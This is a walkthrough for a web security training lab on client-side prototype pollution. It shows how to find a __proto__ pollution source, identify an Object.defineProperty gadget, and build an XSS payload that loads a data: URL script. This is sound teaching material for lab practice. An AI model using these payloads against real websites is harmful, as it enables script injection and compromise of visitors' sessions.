Lab: Client side prototype pollution via browser APIs

Find a prototype pollution source

After starting the exercise, the blog should look like the following illustration.

In our browser, we insert any property (/?__proto__[foo]=bar) at the end of the URL in the address line and confirm with ENTER. Our address line should look like this:

https://<YOUR-LAB-ID>.web-security-academy.net/?__proto__[foo]=bar

We now press the key combination CTRL + SHIFT + I to open the DevTools of the browser and switch to the Console tab.

In Console we now enter Object.prototype and study the properties of the returned object. We notice that the foo property we injected has been added. We have thus successfully found a source for the prototype pollution.

Identify a gadget

We open the Sources tab in DevTools and take a look at the loaded JavaScript files.

In the file searchLoggerConfigurable.js there is a function called searchLogger(). In this function we see the object config, which has a property called transport_url. This property is used to dynamically attach a script to the DOM. Since this property is defined for the config object, it does not appear to be vulnerable. Note that in the next line, the Object.defineProperty() method is used to make the transport_url property non-writable and non-configurable. Note, however, that no value property is defined. The function is shown in the following code snippet:

async function searchLogger() {
    let config = {params: deparam(new URL(location).searchParams.toString()), transport_url: false};
    // make the 'transport_url' unwritable and unconfigurable.
    Object.defineProperty(config, 'transport_url', {configurable: false, writable: false});
    if(config.transport_url) {
        let script = document.createElement('script');
        script.src = config.transport_url;
        document.body.appendChild(script);
    }
    if(config.params && config.params.search) {
        await logQuery('/logger', config.params);
    }
}

Craft an exploit

We now use our identified prototype pollution source and adjust our payload:

/?__proto__[value]=foo

We paste the payload back into our address bar in the browser and confirm with ENTER. In the DevTools of the browser, we switch to the Elements tab and study the HTML code of the blog. We see that a <script> tag with the src="foo" has been created.

We now adapt our payload in the URL and insert an XSS-PoC. For the PoC we use the data: URL. Our payload should now look like this:

https://<YOUR-LAB-ID>.web-security-academy.net/?__proto__[value]=data:,alert(1);

If we now confirm our input with ENTER, we receive a call to the function alert(1). We have now successfully completed this exercise.

Video Solution

PreviousLab: Client side prototype pollution in third party libraries NextLab: Privilege escalation via server side prototype pollution

Last updated 7 days ago